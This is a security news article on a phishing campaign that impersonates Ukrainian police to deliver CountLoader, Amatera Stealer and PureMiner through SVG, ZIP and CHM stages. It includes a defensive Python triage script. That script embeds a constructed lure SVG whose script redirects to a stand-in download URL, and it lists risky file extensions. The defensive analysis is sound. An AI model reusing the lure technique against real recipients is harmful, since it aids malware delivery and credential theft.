Phishing Campaign Impersonates Ukrainian Agencies to Deliver Malware
Overview of Recent Attacks
A series of phishing attacks has emerged in which the senders impersonate Ukrainian government agencies. The campaigns use the CountLoader malware as a first-stage loader for two further payloads, Amatera Stealer and PureMiner.
The Mechanics of the Attack
Researchers at Fortinet's FortiGuard Labs found that the phishing emails carry malicious Scalable Vector Graphics (SVG) attachments. Fortinet analyst Yurren Wan noted that the SVG files are built to trick users into opening what looks like a harmless image, which starts the successive stages of the attack.
In the observed sequence, opening the SVG file triggers the download of a password-protected ZIP archive; encrypting the archive is a common way to keep mail gateways and sandboxes from inspecting its contents. Inside the archive is a Compiled HTML Help (CHM) file. CHM files are rendered by the Windows HTML Help viewer (hh.exe) and can carry embedded script and shortcut objects that run commands, so launching the file sets off the chain that ends with CountLoader being executed. The emails claim to come from the National Police of Ukraine, which lends the lure credibility.
What is CountLoader?
CountLoader has been covered in several analyses, including a recent report by Silent Push. It can deploy a range of payloads, among them Cobalt Strike, AdaptixC2, and PureHVNC RAT. In this campaign it delivers Amatera Stealer, a variant of ACRStealer, together with PureMiner, a .NET cryptocurrency miner.
Malware Suite from PureCoder
PureHVNC RAT and PureMiner belong to a broader suite of malware produced by the threat actor known as PureCoder. Other products in this family include:
- PureCrypter: A crypter for native and .NET payloads.
- PureRAT (also referred to as ResolverRAT): An upgraded version of PureHVNC RAT.
- PureLogs: An information stealer and logger.
- BlueLoader: A botnet client that downloads and runs remote payloads.
- PureClipper: A clipboard hijacker that swaps cryptocurrency addresses copied to the clipboard for attacker-controlled wallet addresses, redirecting transactions.
Fileless Threats and Execution Techniques
According to Fortinet, both Amatera Stealer and PureMiner run as fileless threats: the final payloads execute in memory rather than being written to disk as files. This applies to the payload stage only; the SVG, ZIP and CHM earlier in the chain do land on disk, and that is where file-based detection still has a chance. The in-memory loading is done with .NET Ahead-of-Time (AOT) compiled loaders, process hollowing, or PythonMemoryModule, a Python port of MemoryModule that maps a DLL into memory without touching disk.
Amatera Stealer’s Capabilities
Once running, Amatera Stealer harvests system information, collects files matching a predefined list of extensions, and steals data from Chromium- and Gecko-based browsers. It also targets Steam, Telegram, FileZilla, and a range of cryptocurrency wallets, which makes it especially dangerous for anyone holding digital assets.
The Role of SVG Files
The campaign shows how an SVG file can stand in for an HTML file: SVG is XML, browsers render it as web content, and it can embed script and HTML markup (for example inside a foreignObject element), so an attachment that looks like an image can start an infection chain. Fortinet noted that the attackers targeted Ukrainian government entities and relied on HTML code embedded in the SVG to redirect victims to a malicious download site.
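As an added example (not Fortinet's code and not derived from the campaign's samples), the following Python script shows the two static checks a defender can run on the first stages of the chain described above: flag an SVG that carries script, embedded HTML or event handlers and pull out the URLs it points at, and read a ZIP's central directory to see whether its members are flagged as encrypted and whether any of them is a CHM or other executable-type file, which is visible without the password. The SVG lure and the ZIP are constructed stand-ins (the URL uses the reserved .invalid domain and the "CHM" member is placeholder text), and the ZIP's encryption flag is set by patching the headers, since Python's zipfile cannot write encrypted entries.

```python
"""Static triage for an SVG -> password-protected ZIP -> CHM lure chain.
Example code written for this article; all inputs below are constructed."""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Constructed lure SVG (hypothetical): decoy text plus an embedded XHTML body
# whose script redirects the browser to a download URL when the image loads.
SAMPLE_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="800" height="600" onload="go()">
  <text x="10" y="30">Notice from the National Police (decoy text)</text>
  <foreignObject x="0" y="0" width="800" height="600">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <script>
        function go() { window.location = "http://example.invalid/dl/notice.zip"; }
      </script>
    </body>
  </foreignObject>
</svg>
"""

# Elements that turn an "image" into executable web content.
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
URL_RE = re.compile(rb"https?://[^\s\"'<>]+")
W3_NS_PREFIX = b"http://www.w3.org/"  # namespace URIs are not download links
RISKY_EXTENSIONS = {"chm", "hta", "js", "vbs", "lnk", "exe", "scr"}


def _local(name: str) -> str:
    """Strip an XML namespace prefix like '{http://...}' from a tag or attribute."""
    return name.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> dict:
    """Return active-content indicators and outbound URLs found in an SVG blob."""
    findings = {"active_tags": [], "event_handlers": [], "script_hrefs": [], "urls": []}
    root = ET.fromstring(data)
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings["active_tags"].append(tag)
        for attr, value in el.attrib.items():
            a = _local(attr)
            if a.lower().startswith("on"):  # onload=, onclick=, ...
                findings["event_handlers"].append(f"{tag}@{a}")
            if a.lower() == "href" and value.strip().lower().startswith("javascript:"):
                findings["script_hrefs"].append(f"{tag}@{a}")
    findings["urls"] = sorted(
        u.decode() for u in set(URL_RE.findall(data)) if not u.startswith(W3_NS_PREFIX)
    )
    return findings


def svg_is_active(findings: dict) -> bool:
    """True if the SVG carries anything that can execute script or navigate."""
    return bool(findings["active_tags"] or findings["event_handlers"] or findings["script_hrefs"])


def build_sample_zip() -> bytes:
    """Constructed stand-in for the lure archive. zipfile cannot write encrypted
    entries, so bit 0 (encrypted) of the general-purpose flags is set by hand in
    both the local file header and the central directory entry to mimic a
    password-protected ZIP. The member body is a placeholder, not a real CHM."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
        zf.writestr("Notice_National_Police.chm", b"placeholder, not ITSF data")
    raw = bytearray(buf.getvalue())
    raw[raw.index(b"PK\x03\x04") + 6] |= 0x01  # local file header: flags at +6
    raw[raw.index(b"PK\x01\x02") + 8] |= 0x01  # central directory: flags at +8
    return bytes(raw)


def inspect_zip(data: bytes) -> dict:
    """Read only the central directory: member names and flag bits are visible
    without the password, so a gateway can still act on them."""
    info = {"encrypted": False, "risky_members": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for zi in zf.infolist():
            if zi.flag_bits & 0x1:
                info["encrypted"] = True
            ext = zi.filename.rsplit(".", 1)[-1].lower() if "." in zi.filename else ""
            if ext in RISKY_EXTENSIONS:
                info["risky_members"].append(zi.filename)
    return info


if __name__ == "__main__":
    svg = scan_svg(SAMPLE_SVG)
    print("SVG active:", svg_is_active(svg), svg)
    print("ZIP:", inspect_zip(build_sample_zip()))
```

The SVG check deliberately parses the file as XML rather than grepping for "script", so namespaced tags and attributes inside a foreignObject are still seen; the URL extraction runs over the raw bytes so it also catches links in comments or CDATA that the parser would not expose as attributes. A benign SVG can legitimately use foreignObject or event handlers, so treat a hit as a reason to detonate or block the attachment, not as proof of malice on its own.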
Connections to Other Threat Groups
Separately, Huntress has reported phishing activity attributed to a Vietnamese-speaking threat group. That group also uses phishing emails, in this case posing as copyright infringement notices, to get recipients to open ZIP archives that install PXA Stealer, which in turn deploys PureRAT.
Evolving Threat Landscape
Security researcher James Northey commented on how these campaigns have evolved, noting the methodical progression from basic phishing techniques to complex infection chains. He described the final payload, PureRAT, as a highly modular backdoor that gives operators extensive control over compromised systems.
The move from rudimentary techniques to malware like PureRAT reflects persistence, and it also signals the presence of experienced operators in the cybercriminal landscape.